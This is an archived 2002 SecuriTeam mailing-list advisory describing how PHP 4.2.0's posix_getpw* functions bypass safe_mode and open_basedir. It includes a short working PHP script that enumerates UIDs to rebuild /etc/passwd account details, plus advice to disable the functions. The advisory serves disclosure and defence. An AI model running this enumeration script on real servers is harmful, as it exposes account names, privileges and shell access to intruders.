[UNIX] Posix_getpw* Ignores Safe_mode and Open_basedir Settings
From: support@securiteam.comDate: 04/23/02
- Previous message: support@securiteam.com: "[TOOL] DLock, File Watcher and Locking Mechanism (Windows)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 23 Apr 2002 21:12:24 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Posix_getpw* Ignores Safe_mode and Open_basedir Settings
------------------------------------------------------------------------
SUMMARY
<http://www.php.net/manual/en/ref.posix.php> Posix_getpw* are two POSIX
functions, posix_getpwnam and posix_getpwuid, one returns user information
about a user based on a provided name, and the other returns user
information based on UID. These two functions seem to be unaffected by
settings of Safe_mode and Open_basedir. This would allow the compromising
of sensitive information such as usernames, and all available information
in the /etc/passwd file (Phone numbers, group names, etc).
DETAILS
Vulnerable systems:
* PHP version 4.2.0
Posix_* functions do not check whether safe_mode or open_basedir restrict
the access the user has, thus allowing a user to rebuild a complete
/etc/passwd without requiring any permissions to read /etc/passwd or
access the /etc directory.
This is dangerous in some cases where login are kept secret as it allows a
user to know what accounts have what privileges and what accounts have
access to a shell or not. For now, there is only one thing to do, disable
these functions.
Example:
Here is a script that rebuilds /etc/passwd when safe_mode is enabled and
open_basedir is set to the user home directory:
<?
for ($i = 0; $i < 60000; $i++)
{
if (($tab = @posix_getpwuid($i)) != NULL)
{
echo $tab['name'].":";
echo $tab['passwd'].":";
echo $tab['uid'].":";
echo $tab['gid'].":";
echo $tab['gecos'].":";
echo $tab['dir'].":";
echo $tab['shell']."<br>";
}
}
?>
On a very large system, if an execution time is set, this will not end up,
but hopefully the posix_getpwent() function is missing so the user has to
go through all possible UID's
ADDITIONAL INFORMATION
The information has been provided by <mailto:veins@skreel.org> veins.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] DLock, File Watcher and Locking Mechanism (Windows)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] www.address.com Account Hijacking Vulnerability
... overwrite existing accounts. ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [EXPL] SLMail PASS Buffer Overflow
... The following exploit code can be used to test your SLMail ... # Discovered
by: Muts # ... The information in this bulletin is provided "AS IS" without warranty
of any kind. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [EXPL] Xsun (Sparc) Local Exploit (RGB_DB)
... struct TREE { ... main(int argc, char *argv) ... The information
in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall
we be liable for any damages whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages. ... (Securiteam) - [TOOL] BSD-AirTools, WEP Related Tools
... netstumbler (dstumbler) that can be used to detect wireless access points ...
of the prism2 debug modes as well as do basic analysis of the ... The information in this
bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be
liable for any damages whatsoever including direct, indirect, incidental, consequential, loss
of business profits or special damages. ... (Securiteam) - [UNIX] php(Reactor) Cross Site Scripting Vulnerability
... Therefore, any user may construct a malicious link, gain ... the $fid and $tid
variables should be integers. ... The information in this bulletin is provided "AS
IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)
